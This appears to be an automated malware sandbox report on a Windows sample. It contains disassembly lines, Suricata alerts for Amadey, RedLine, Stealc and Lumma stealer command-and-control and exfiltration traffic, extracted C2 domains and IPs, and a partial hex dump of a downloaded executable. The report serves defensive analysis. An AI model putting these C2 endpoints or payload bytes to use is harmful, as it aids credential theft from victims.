                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then movzx eax, word ptr [esi+ecx]14_2_00EF2280
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then mov word ptr [eax], cx14_2_00EDA274
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then mov word ptr [edx], ax14_2_00EDA274
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then mov ebx, eax14_2_00EBA3C0
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then mov ebp, eax14_2_00EBA3C0
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh14_2_00EDC390
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh14_2_00EDC390
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 0633C81Dh14_2_00EF9390
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then mov eax, dword ptr [esp]14_2_00EF9390
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h14_2_00EE1370
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then mov word ptr [eax], cx14_2_00EDA345
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then mov word ptr [edx], ax14_2_00EDA345
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then mov eax, dword ptr [esp]14_2_00EDA345
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h14_2_00ED04A0
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then mov word ptr [eax], dx14_2_00ED04A0
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then mov eax, dword ptr [esp]14_2_00ED4490
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then mov eax, dword ptr [esp]14_2_00EDF5B7
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then mov ecx, esi14_2_00EDD58E
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then mov ecx, esi14_2_00EDD56C
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then mov eax, dword ptr [esi+000006A8h]14_2_00ECE52C
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then movzx ebx, byte ptr [edx]14_2_00EEB510
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then mov eax, dword ptr [esi]14_2_00EC46B5
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then movzx edx, byte ptr [ecx+eax]14_2_00EBF7E0
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then mov byte ptr [ebx], al14_2_00EE27B0
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]14_2_00EE27B0
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then mov byte ptr [ebx], al14_2_00EE27B0
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then mov byte ptr [ebx], al14_2_00EE27B0
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then mov byte ptr [ebx], al14_2_00EE27B0
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then mov byte ptr [ebx], al14_2_00EE27B0
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then mov byte ptr [edi], al14_2_00EE27B0
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then mov byte ptr [edi], al14_2_00EE27B0
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then mov byte ptr [ebx], al14_2_00EE27B0
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then mov byte ptr [edx], cl14_2_00EE27B0
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then mov dword ptr [esp], 00000000h14_2_00ECA880
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then cmp al, 2Eh14_2_00EDC891
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then xor eax, eax14_2_00EDC891
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 54CA534Eh14_2_00EF89F0
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh14_2_00EF4970
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then mov eax, dword ptr [esi]14_2_00EC3AE6
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then mov ebx, ecx14_2_00EC3AE6
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then cmp byte ptr [edi], 00000000h14_2_00EC3AE6
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 0633C81Dh14_2_00EF5AD0
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then mov byte ptr [edi], al14_2_00EE4A2F
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then movzx ecx, word ptr [edi+eax]14_2_00EF8BE0
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]14_2_00EE0BD0
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then jmp edx14_2_00ED7B0F
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then mov eax, dword ptr [esp+0Ch]14_2_00EDBB00
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h14_2_00ED6CA0
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]14_2_00EB4C10
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then mov byte ptr [edi], al14_2_00EE4DF6
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then mov eax, dword ptr [esp+0Ch]14_2_00EF5D80
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h14_2_00EFAD90
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then add edi, 02h14_2_00ECDD64
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then mov eax, dword ptr [ebx]14_2_00ECDD64
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]14_2_00EB5D20
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]14_2_00EF7EDE
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then mov eax, dword ptr [esi+1Ch]14_2_00EBFEBC
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then mov eax, dword ptr [esp]14_2_00EF9E60
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then cmp byte ptr [ebx], 00000000h14_2_00EC4E26
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then xor eax, eax14_2_00EC4E26
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then xor eax, eax14_2_00EBEFFC
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then mov eax, dword ptr [esp+00000120h]14_2_00EBEFFC
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h14_2_00ECCFF0
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then mov word ptr [eax], cx14_2_00ED6F20
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then mov eax, dword ptr [esp]14_2_00EFAF10
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeCode function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah14_2_00EFAF10

                                  Networking

                                  barindex
                                  Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49712 -> 185.215.113.16:80
                                  Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:49710 -> 185.215.113.16:80
                                  Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.16:80 -> 192.168.2.5:49710
                                  Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49715 -> 185.215.113.16:80
                                  Source: Network trafficSuricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.5:49714 -> 95.179.250.45:26212
                                  Source: Network trafficSuricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.5:49719 -> 65.21.18.51:45580
                                  Source: Network trafficSuricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.5:49719 -> 65.21.18.51:45580
                                  Source: Network trafficSuricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 65.21.18.51:45580 -> 192.168.2.5:49719
                                  Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49720 -> 185.215.113.16:80
                                  Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49723 -> 185.215.113.16:80
                                  Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:49721 -> 185.215.113.26:80
                                  Source: Network trafficSuricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.5:49714 -> 95.179.250.45:26212
                                  Source: Network trafficSuricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 95.179.250.45:26212 -> 192.168.2.5:49714
                                  Source: Network trafficSuricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 95.179.250.45:26212 -> 192.168.2.5:49714
                                  Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49722 -> 185.215.113.17:80
                                  Source: Network trafficSuricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.5:49722 -> 185.215.113.17:80
                                  Source: Network trafficSuricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.17:80 -> 192.168.2.5:49722
                                  Source: Network trafficSuricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.5:49722 -> 185.215.113.17:80
                                  Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.17:80 -> 192.168.2.5:49722
                                  Source: Network trafficSuricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.5:49722 -> 185.215.113.17:80
                                  Source: Network trafficSuricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 65.21.18.51:45580 -> 192.168.2.5:49719
                                  Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.26:80 -> 192.168.2.5:49721
                                  Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49728 -> 185.215.113.16:80
                                  Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49731 -> 185.215.113.16:80
                                  Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49738 -> 185.215.113.16:80
                                  Source: Network trafficSuricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.5:49743 -> 89.105.223.196:29862
                                  Source: Network trafficSuricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.5:49743 -> 89.105.223.196:29862
                                  Source: Network trafficSuricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 89.105.223.196:29862 -> 192.168.2.5:49743
                                  Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49744 -> 185.215.113.16:80
                                  Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49749 -> 185.215.113.16:80
                                  Source: Network trafficSuricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.5:49750 -> 185.215.113.67:15206
                                  Source: Network trafficSuricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.5:49750 -> 185.215.113.67:15206
                                  Source: Network trafficSuricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 185.215.113.67:15206 -> 192.168.2.5:49750
                                  Source: Network trafficSuricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 89.105.223.196:29862 -> 192.168.2.5:49743
                                  Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49755 -> 91.202.233.158:80
                                  Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49757 -> 185.215.113.16:80
                                  Source: Network trafficSuricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 185.215.113.67:15206 -> 192.168.2.5:49750
                                  Source: Network trafficSuricata IDS: 2056156 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawzhotdog .shop) : 192.168.2.5:60924 -> 1.1.1.1:53
                                  Source: Network trafficSuricata IDS: 2056157 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawzhotdog .shop in TLS SNI) : 192.168.2.5:49761 -> 172.67.162.108:443
                                  Source: Network trafficSuricata IDS: 2056164 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop) : 192.168.2.5:54804 -> 1.1.1.1:53
                                  Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49763 -> 185.215.113.16:80
                                  Source: Network trafficSuricata IDS: 2056165 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI) : 192.168.2.5:49764 -> 104.21.4.136:443
                                  Source: Network trafficSuricata IDS: 2056162 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ghostreedmnu .shop) : 192.168.2.5:63062 -> 1.1.1.1:53
                                  Source: Network trafficSuricata IDS: 2056163 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI) : 192.168.2.5:49768 -> 188.114.97.3:443
                                  Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49767 -> 185.215.113.37:80
                                  Source: Network trafficSuricata IDS: 2056160 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (offensivedzvju .shop) : 192.168.2.5:52855 -> 1.1.1.1:53
                                  Source: Network trafficSuricata IDS: 2056161 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (offensivedzvju .shop in TLS SNI) : 192.168.2.5:49770 -> 188.114.96.3:443
                                  Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49753 -> 185.215.113.16:80
                                  Source: Network trafficSuricata IDS: 2056158 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vozmeatillu .shop) : 192.168.2.5:56006 -> 1.1.1.1:53
                                  Source: Network trafficSuricata IDS: 2056154 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fragnantbui .shop) : 192.168.2.5:55665 -> 1.1.1.1:53
                                  Source: Network trafficSuricata IDS: 2056157 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawzhotdog .shop in TLS SNI) : 192.168.2.5:49775 -> 172.67.162.108:443
                                  Source: Network trafficSuricata IDS: 2056155 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fragnantbui .shop in TLS SNI) : 192.168.2.5:49777 -> 188.114.97.3:443
                                  Source: Network trafficSuricata IDS: 2056159 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (vozmeatillu .shop in TLS SNI) : 192.168.2.5:49772 -> 188.114.96.3:443
                                  Source: Network trafficSuricata IDS: 2056152 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stogeneratmns .shop) : 192.168.2.5:60964 -> 1.1.1.1:53
                                  Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49774 -> 185.215.113.16:80
                                  Source: Network trafficSuricata IDS: 2056153 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (stogeneratmns .shop in TLS SNI) : 192.168.2.5:49779 -> 188.114.96.3:443
                                  Source: Network trafficSuricata IDS: 2056150 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (reinforcenh .shop) : 192.168.2.5:55686 -> 1.1.1.1:53
                                  Source: Network trafficSuricata IDS: 2056151 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (reinforcenh .shop in TLS SNI) : 192.168.2.5:49780 -> 172.67.208.139:443
                                  Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49785 -> 185.215.113.16:80
                                  Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.5:49782
                                  Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49796 -> 185.215.113.37:80
                                  Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49782 -> 185.215.113.43:80
                                  Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49791 -> 185.215.113.37:80
                                  Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49779 -> 188.114.96.3:443
                                  Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49761 -> 172.67.162.108:443
                                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49779 -> 188.114.96.3:443
                                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49761 -> 172.67.162.108:443
                                  Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49764 -> 104.21.4.136:443
                                  Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49786 -> 104.21.2.13:443
                                  Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49780 -> 172.67.208.139:443
                                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49764 -> 104.21.4.136:443
                                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49786 -> 104.21.2.13:443
                                  Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49775 -> 172.67.162.108:443
                                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49780 -> 172.67.208.139:443
                                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49775 -> 172.67.162.108:443
                                  Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49777 -> 188.114.97.3:443
                                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49777 -> 188.114.97.3:443
                                  Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49768 -> 188.114.97.3:443
                                  Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49772 -> 188.114.96.3:443
                                  Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49770 -> 188.114.96.3:443
                                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49770 -> 188.114.96.3:443
                                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49772 -> 188.114.96.3:443
                                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49768 -> 188.114.97.3:443
                                  Source: Malware configuration extractorURLs: http://91.202.233.158/e96ea2db21fa9a1b.php
                                  Source: Malware configuration extractorURLs: lootebarrkeyn.shop
                                  Source: Malware configuration extractorURLs: ghostreedmnu.shop
                                  Source: Malware configuration extractorURLs: fragnantbui.shop
                                  Source: Malware configuration extractorURLs: vozmeatillu.shop
                                  Source: Malware configuration extractorURLs: stogeneratmns.shop
                                  Source: Malware configuration extractorURLs: reinforcenh.shop
                                  Source: Malware configuration extractorURLs: offensivedzvju.shop
                                  Source: Malware configuration extractorURLs: gutterydhowi.shop
                                  Source: Malware configuration extractorURLs: drawzhotdog.shop
                                  Source: Malware configuration extractorURLs: 188.190.10.161
                                  Source: Malware configuration extractorURLs: http://91.202.233.158/e96ea2db21fa9a1b.php
                                  Source: Malware configuration extractorIPs: 185.215.113.16
                                  Source: Malware configuration extractorURLs: 95.179.250.45:26212
                                  Source: global trafficTCP traffic: 185.215.113.67 ports 0,1,2,5,6,15206
                                  Source: Yara matchFile source: 36.2.rstxdhuj.exe.4141590.4.raw.unpack, type: UNPACKEDPE
                                  Source: global trafficTCP traffic: 192.168.2.5:49714 -> 95.179.250.45:26212
                                  Source: global trafficTCP traffic: 192.168.2.5:49719 -> 65.21.18.51:45580
                                  Source: global trafficTCP traffic: 192.168.2.5:49743 -> 89.105.223.196:29862
                                  Source: global trafficTCP traffic: 192.168.2.5:49750 -> 185.215.113.67:15206
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 02:21:04 GMTContent-Type: application/octet-streamContent-Length: 320000Last-Modified: Wed, 11 Sep 2024 19:08:04 GMTConnection: keep-aliveETag: "66e1ea94-4e200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 67 e5 e1 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 d8 04 00 00 08 00 00 00 00 00 00 5e f7 04 00 00 20 00 00 00 00 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 05 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 f7 04 00 4b 00 00 00 00 00 05 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 05 00 0c 00 00 00 d8 f5 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 64 d7 04 00 00 20 00 00 00 d8 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 00 06 00 00 00 00 05 00 00 06 00 00 00 da 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 05 00 00 02 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 f7 04 00 00 00 00 00 48 00 00 00 02 00 05 00 68 e8 04 00 70 0d 00 00 03 00 02 00 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3e 49 98 c5 eb e4 07 3d 4e 57 c4 94 0e b8 53 b5 28 8c a4 60 7d 43 e0 bd be a1 50 3f 32 96 e1 7f 68 ee 09 6c 85 3c 41 15 49 09 ba d4 fa f6 43 4e bc b8 ee c3 2f 99 75 8f 13 54 98 eb 94 d5 14 eb ae 0f 0f 40 0b 24 ba 30 ac ba 72 e4 aa c5 d3 22 5f 38 29 4c a5 93 97 73 a9 59 51 ec 11 25 fb 2f 3f dd c0 ca 4c 9f a3 37 65 26 5b d4 7a e2 92 dd eb bd c1 ae 2a 12 e3 6a 2e 9a 38 4a cb f5 ec b2 73 6e a8 3d e2 e0 4f dc a1 c9 e4 7c b2 90 d7 6e b7 f6 87 10 17 67 55 44 47 b4 ac 48 4b 1b 0e e4 87 e2 52 05 54 dc fa e9 31 4c 7a ca d5 dd 7f 0d 46 b5 7f 5e 6c ca b6 79 a8 7b 4a 80 90 42 7c 80 f8 ad 60 9f 6f 48 f3 8c 33 c5 fb 13 ac f3 56 4e d2 d8 66 94 7d 4a 06 87 f6 2f bf 3f 7f b6 89 bf dd e0 a0 b3 da b3 34 6e 45 85 